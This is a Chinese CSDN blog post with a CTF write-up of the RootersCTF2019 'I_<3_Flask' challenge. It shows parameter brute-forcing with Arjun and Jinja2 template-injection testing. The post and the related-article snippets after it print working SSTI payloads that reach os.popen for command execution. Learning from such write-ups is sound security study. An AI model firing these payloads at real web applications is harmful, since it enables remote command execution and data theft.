[RootersCTF2019]I_<3_Flask

最新推荐文章于 2023-07-17 15:21:09 发布
最新推荐文章于 2023-07-17 15:21:09 发布
阅读量723 收藏
点赞数
分类专栏: ssti模板注入 # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115715212
版权
本文探讨了一起利用Jinja2模板注入漏洞进行攻击的案例,通过Arjun工具成功爆破参数并获取flag。博客详细描述了注入过程,指出在无过滤的情况下,可以使用常规注入语句。内容涉及网络安全、Web应用安全及Python模板引擎的安全隐患。
摘要由CSDN通过智能技术生成

场景
在这里插入图片描述
猜测是jinja2的模板注入,用Arjun工具爆破参数
下载地址
找到了参数name
在这里插入图片描述
传参?name={{7*'7'}},注入成功
在这里插入图片描述
这题没有过滤,直接用常规的注入语句即可

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat flag.txt').read()") }}{% endif %}{% endfor %}

拿到flag
在这里插入图片描述

fmyyy1
关注
专栏目录
RootersCTF2019 I ♥ Flask
汗的博客
08-29 507
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
flask-ldap3-login:FlaskFlask登录的LDAP3登录
02-05
**Flask-LDAP3-Login:在Flask中实现LDAP身份验证** Flask-LDAP3-Login是一个用于Flask应用的扩展,它提供了一种简单的方法来集成 Lightweight Directory Access Protocol (LDAP) 身份验证。这个扩展使得在Python ...
os模块
qq_45594312的博客
01-11 181
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
[RootersCTF2019]I_3_Flask 1&arjun爆破参数
plant1234的博客
10-04 1630
根据测试发现有ssti模板注入。
BUUCTF RootersCTF2019]I_3_Flask
CyhDl666的博客
03-17 323
文章目录手注tplmap 手注 刚进入题目 知道是SSTI注入 但是没找到注入点 学到了一个新的工具 Arjun 扫描到get参数name ?name={{'aaa'.upper()}} 确定是SSTI注入 构造payload: {% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% en
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。
pythonflaskdemo_pythonflaskdemo_pythonflask_flask_DEMO_源码.zip
09-30
"pythonflaskdemo_pythonflaskdemo_pythonflask_flask_DEMO_源码.zip" 是一个包含Flask应用示例代码的压缩包,它可能包含了从基础到进阶的多种Flask用法。下面将详细探讨Flask框架的相关知识点。 1. **安装与基本...
强大的端口扫描工具! 绝对无毒绿色!
07-13
强大的端口扫描工具! 绝对无毒绿色!快来下载,无毒!
BUUCTF [RootersCTF2019] I_3_Flask
Senimo
12-19 1300
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
BUUCTF-[RootersCTF2019]I_3_Flask
最新发布
weixin_49803180的博客
07-17 270
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
[RootersCTF2019]I_3_Flask(参数爆破工具arjun)
qq_44657899的博客
08-16 1689
arjun安装 下载地址 s0md3v /Arjun cd Arjun-2.1.4 pip3 install arjun py -3 setup.py install 如果输入arjun -h有如下输出则安装成功 解题 首先使用arjun爆破参数 arjun -u http://aac8b7e4-008f-486a-9642-232db8c62642.node4.buuoj.cn:81/ -c 100 -d 5 参数: -d DELAY Delay between requests in secon
BUUCTF--[RootersCTF2019]I_3_Flask
qq_46263951的博客
07-15 312
进入页面后发现并没有什么可以利用的地方 利用Arjun扫描可以得到一个参数name 接下来要利用SSTI模板注入 尝试模板注入,发现可以成功执行 ?name={{8*8}} 方法一: 直接可以利用此漏洞执行payload ?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}} 方法二: 使用tplmap,可以得到是存在jinjia2模版注入再进行getshell即可拿到flag 由于我这边...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值